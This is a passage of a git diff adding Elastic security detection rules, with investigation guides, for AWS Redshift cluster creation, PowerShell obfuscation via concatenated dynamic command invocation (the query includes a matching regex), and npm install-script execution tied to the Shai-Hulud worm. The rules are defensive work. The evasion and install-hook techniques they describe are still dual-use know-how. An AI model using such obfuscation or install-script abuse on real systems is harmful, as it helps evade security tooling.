packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_1.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/9c865691-5599-447a-bac9-b3f2df5f9a9d_111.json create mode 100644 packages/security_detection_engine/kibana/security_rule/9edd1804-83c7-4e48-b97d-c776b4c97564_5.json create mode 100644 packages/security_detection_engine/kibana/security_rule/9efb3f79-b77b-466a-9fa0-3645d22d1e7f_6.json create mode 100644 packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_7.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_113.json create mode 100644 packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_214.json create mode 100644 packages/security_detection_engine/kibana/security_rule/a1b2c3d4-e5f6-7890-abcd-ef1234567890_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35_2.json create mode 100644 packages/security_detection_engine/kibana/security_rule/a640ef5b-e1da-4b17-8391-468fdbd1b517_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/a8b3e2f0-8c7d-11ef-b4c6-f661ea17fbcd_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/a8f7e9d4-3b2c-4d5e-8f1a-6c9b0e2d4a7f_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/ab8f074c-5565-4bc4-991c-d49770e19fc9_8.json create mode 100644 packages/security_detection_engine/kibana/security_rule/ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1_212.json create mode 100644 packages/security_detection_engine/kibana/security_rule/ad66db2e-1cc7-4a2c-8fa5-5f3895e44a18_4.json create mode 100644 packages/security_detection_engine/kibana/security_rule/ae3e9625-89ad-4fc3-a7bf-fced5e64f01b_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/b0c98cfb-0745-4513-b6f9-08dddb033490_6.json create mode 100644 packages/security_detection_engine/kibana/security_rule/b240bfb8-26b7-4e5e-924e-218144a3fa71_108.json create mode 100644 packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f123456789ab_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/b2c3d4e5-f6a7-8901-bcde-f23456789012_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/b36c99af-b944-4509-a523-7e0fad275be1_6.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/b45ab1d2-712f-4f01-a751-df3826969807_207.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_108.json create mode 100644 packages/security_detection_engine/kibana/security_rule/b9c8d7e6-5a4f-3c2b-1d0e-9f8a7b6c5d4e_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/ba342eb2-583c-439f-b04d-1fdd7c1417cc_210.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_211.json create mode 100644 packages/security_detection_engine/kibana/security_rule/bf1073bf-ce26-4607-b405-ba1ed8e9e204_211.json create mode 100644 packages/security_detection_engine/kibana/security_rule/c0136397-f82a-45e5-9b9f-a3651d77e21a_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/c3d4e5f6-a7b8-9012-cdef-123456789abc_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/c595363f-52a6-49e1-9257-0e08ae043dbd_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/c6b40f4c-c6a9-434e-adb8-989b0d06d005_2.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/c70d9f0d-8cb6-4cfc-85df-a95c1ccf4eab_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/c7db5533-ca2a-41f6-a8b0-ee98abe0f573_109.json create mode 100644 packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_219.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/d1e5e410-3e34-412e-9b1f-dd500b3b55cd_2.json create mode 100644 packages/security_detection_engine/kibana/security_rule/d1f310cb-5921-4d37-bbdf-cfdab7a6df9c_1.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_109.json create mode 100644 packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_5.json create mode 100644 packages/security_detection_engine/kibana/security_rule/d488f026-7907-4f56-ad51-742feb3db01c_5.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_209.json create mode 100644 packages/security_detection_engine/kibana/security_rule/d788313c-9e0b-4c5a-8c4b-c3f05a47d5a8_4.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_210.json create mode 100644 packages/security_detection_engine/kibana/security_rule/d9af2479-ad13-4471-a312-f586517f1243_3.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_112.json create mode 100644 packages/security_detection_engine/kibana/security_rule/dca28dee-c999-400f-b640-50a081cc0fd1_212.json create mode 100644 packages/security_detection_engine/kibana/security_rule/df0553c8-2296-45ef-b4dc-3b88c4c130a7_1.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_210.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d_207.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/e4e31051-ee01-4307-a6ee-b21b186958f4_209.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_308.json create mode 100644 packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_112.json create mode 100644 packages/security_detection_engine/kibana/security_rule/e8c9ff14-fd1e-11ee-a0df-f661ea17fbce_7.json create mode 100644 packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_8.json create mode 100644 packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_213.json create mode 100644 packages/security_detection_engine/kibana/security_rule/eaa77d63-9679-4ce3-be25-3ba8b795e5fa_108.json create mode 100644 packages/security_detection_engine/kibana/security_rule/eb079c62-4481-4d6e-9643-3ca499df7aaa_106.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_215.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f2015527-7c46-4bb9-80db-051657ddfb69_6.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_6.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_2.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f48ecc44-7d02-437d-9562-b838d2c41987_7.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_215.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f6652fb5-cd8e-499c-8311-2ce2bb6cac62_6.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f6d8c743-0916-4483-8333-3c6f107e0caa_6.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_209.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/f8822053-a5d2-46db-8c96-d460b12c36ac_106.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f92171ed-a4d3-4baa-98f9-4df1652cb11b_1.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_207.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_5.json delete mode 100644 packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_112.json create mode 100644 packages/security_detection_engine/kibana/security_rule/f9abcddc-a05d-4345-a81d-000b79aa5525_7.json create mode 100644 packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_317.json create mode 100644 packages/security_detection_engine/kibana/security_rule/fe8d6507-b543-4bbc-849f-dc0da6db29f6_4.json diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index bef5e10e404..faf1ff209e7 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml @@ -1,5 +1,10 @@ # newer versions go on top # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production +- version: 9.0.19-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pulls/0000 - version: 9.0.18 changes: - description: Release security rules update diff --git a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_6.json b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_6.json index 4276efe73dc..52e875cd1a2 100644 --- a/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_6.json +++ b/packages/security_detection_engine/kibana/security_rule/00678712-b2df-11ed-afe9-f661ea17fbcc_6.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_210.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_210.json index 976fe6d8573..a5f4274782b 100644 --- a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_210.json +++ b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_210.json b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_210.json new file mode 100644 index 00000000000..c6fc4c15e5e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/015cca13-8832-49ac-a01b-a396114809f6_210.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of an Amazon Redshift cluster. Unexpected creation of this cluster by a non-administrative user may indicate a permission or role issue with current users. If unexpected, the resource may not properly be configured and could introduce security vulnerabilities.", + "false_positives": [ + "Valid clusters may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Cluster creations by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Deprecated - AWS Redshift Cluster Creation", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Deprecated - AWS Redshift Cluster Creation\n\nAmazon Redshift is a data warehousing service that allows for scalable data storage and analysis. In a secure environment, only authorized users should create Redshift clusters. Adversaries might exploit misconfigured permissions to create clusters, potentially leading to data exfiltration or unauthorized data processing. The detection rule monitors for successful cluster creation events, especially by non-admin users, to identify potential misuse or misconfigurations.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the event.dataset:aws.cloudtrail and event.provider:redshift.amazonaws.com to confirm the details of the CreateCluster event, including the timestamp and the user who initiated the action.\n- Identify the IAM role or user associated with the event.action:CreateCluster and verify if this user is expected to have permissions to create Redshift clusters. Check for any recent changes to their permissions or roles.\n- Investigate the event.outcome:success to ensure that the cluster creation was indeed successful and determine the region and account where the cluster was created.\n- Examine the configuration of the newly created Redshift cluster to ensure it adheres to security best practices, such as encryption settings, VPC configurations, and access controls.\n- Cross-reference the user activity with other logs or alerts to identify any unusual patterns or behaviors that might indicate misuse or compromise, such as multiple cluster creation attempts or access from unfamiliar IP addresses.\n- Contact the user or team responsible for the account to verify if the cluster creation was intentional and authorized, and document their response for future reference.\n\n### False positive analysis\n\n- Routine maintenance or testing activities by non-admin users can trigger alerts. To manage this, create exceptions for specific users or roles known to perform these tasks regularly.\n- Automated scripts or third-party tools that create clusters as part of their normal operation may cause false positives. Identify these tools and exclude their associated user accounts or roles from the detection rule.\n- Development or staging environments where non-admin users are permitted to create clusters for testing purposes can lead to alerts. Implement environment-specific exclusions to prevent unnecessary alerts.\n- Temporary permissions granted to non-admin users for specific projects can result in cluster creation alerts. Monitor and document these permissions, and adjust the detection rule to account for these temporary changes.\n\n### Response and remediation\n\n- Immediately isolate the Redshift cluster to prevent any unauthorized access or data exfiltration. This can be done by modifying the security group rules to restrict inbound and outbound traffic.\n- Review the IAM roles and permissions associated with the user who created the cluster. Revoke any unnecessary permissions and ensure that the principle of least privilege is enforced.\n- Conduct a thorough audit of recent CloudTrail logs to identify any other unauthorized activities or anomalies associated with the same user or related accounts.\n- If data exfiltration is suspected, initiate a data integrity check and consider restoring from a known good backup to ensure no data tampering has occurred.\n- Notify the security team and relevant stakeholders about the incident for further investigation and to determine if additional security measures are needed.\n- Implement additional monitoring and alerting for Redshift cluster creation events, especially focusing on non-administrative users, to quickly detect similar activities in the future.\n- Consider enabling multi-factor authentication (MFA) for all users with permissions to create or modify Redshift clusters to add an extra layer of security.", + "query": "event.dataset:aws.cloudtrail and event.provider:redshift.amazonaws.com and event.action:CreateCluster and event.outcome:success\n", + "references": [ + "https://docs.aws.amazon.com/redshift/latest/APIReference/API_CreateCluster.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "015cca13-8832-49ac-a01b-a396114809f6", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Redshift", + "Use Case: Asset Visibility", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "015cca13-8832-49ac-a01b-a396114809f6_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_210.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_210.json index beb653914fa..b2c2d5b3a3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_210.json +++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_109.json index e6542687673..ed6a52c63f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_109.json +++ b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_109.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_5.json b/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_5.json new file mode 100644 index 00000000000..763b2408f12 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_5.json @@ -0,0 +1,168 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use concatenated strings within dynamic command invocation (&() or .()) as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation\n\nPowerShell is a powerful scripting language used for task automation and configuration management in Windows environments. Adversaries exploit its capabilities by obfuscating commands to evade detection, often using concatenated strings in dynamic invocations. This detection rule identifies such obfuscation by analyzing script patterns, specifically looking for concatenated strings within dynamic command invocations, which are indicative of attempts to bypass security measures like AMSI. By counting these patterns, the rule effectively flags suspicious scripts, aiding in the identification of potential threats.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the content and purpose of the script, focusing on the concatenated strings and dynamic command invocations.\n- Check the `host.name` and `user.id` fields to identify the machine and user account associated with the execution of the suspicious script, which can help determine if the activity is expected or anomalous.\n- Analyze the `file.path` field to locate the script's source or storage location, which may provide additional context or indicate if the script is part of a known application or process.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution sequence and correlate it with other related PowerShell activities, which might reveal a broader pattern of behavior.\n- Assess the `agent.id` field to determine the specific endpoint agent involved, which can assist in further endpoint-specific investigations or actions.\n\n### False positive analysis\n\n- Scripts with legitimate concatenated strings for dynamic command execution may trigger the rule. Review the script context to determine if the concatenation serves a valid administrative purpose.\n- Automated scripts from trusted sources that use concatenation for modularity or readability might be flagged. Consider adding these scripts to an allowlist if they are verified as safe.\n- Development or testing environments where PowerShell scripts are frequently modified and tested could generate false positives. Implement exceptions for known development hosts or user accounts.\n- Security tools or monitoring solutions that use PowerShell for legitimate operations may inadvertently match the pattern. Identify these tools and exclude their operations from the rule.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and does not inadvertently allow malicious activity.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of obfuscated commands.\n- Conduct a thorough review of the script block text and associated script block ID to understand the intent and potential impact of the obfuscated commands.\n- Remove any unauthorized or malicious scripts from the affected system and ensure that all legitimate scripts are verified and signed.\n- Restore the affected system from a known good backup if any malicious activity is confirmed, ensuring that all data integrity checks are performed.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems have been compromised.\n- Update endpoint protection and monitoring tools to enhance detection capabilities for similar obfuscation techniques, leveraging insights from the MITRE ATT&CK framework.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*+*\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"[.&]\\(\\s*(['\"][A-Za-z0-9.-]+['\"]\\s*\\+\\s*)+['\"][A-Za-z0-9.-]+['\"]\\s*\\)\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "083383af-b9a4-42b7-a463-29c40efe7797", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 5 + }, + "id": "083383af-b9a4-42b7-a463-29c40efe7797_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0871a5d8-6b5f-4a12-a568-fd7bc05bd8db_3.json b/packages/security_detection_engine/kibana/security_rule/0871a5d8-6b5f-4a12-a568-fd7bc05bd8db_3.json new file mode 100644 index 00000000000..ff01a1d7d73 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0871a5d8-6b5f-4a12-a568-fd7bc05bd8db_3.json @@ -0,0 +1,170 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the execution of Node.js pre or post-install scripts. These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*", + "logs-crowdstrike.fdr*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Node.js Pre or Post-Install Script Execution", + "query": "sequence by host.id with maxspan=10s\n [process where host.os.type in (\"linux\", \"macos\") and event.type == \"start\" and event.action in (\"exec\", \"ProcessRollup2\", \"start\") and process.name == \"node\" and process.args == \"install\"] by process.entity_id\n [process where host.os.type in (\"linux\", \"macos\") and event.type == \"start\" and event.action in (\"exec\", \"ProcessRollup2\", \"start\") and process.parent.name == \"node\"] by process.parent.entity_id\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack", + "https://www.elastic.co/blog/shai-hulud-worm-2-0-updated-response" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0871a5d8-6b5f-4a12-a568-fd7bc05bd8db", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + }, + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.005", + "name": "Malicious Library", + "reference": "https://attack.mitre.org/techniques/T1204/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 3 + }, + "id": "0871a5d8-6b5f-4a12-a568-fd7bc05bd8db_3", + "type": "security-rule" +} \ No newline at end of file diff --git 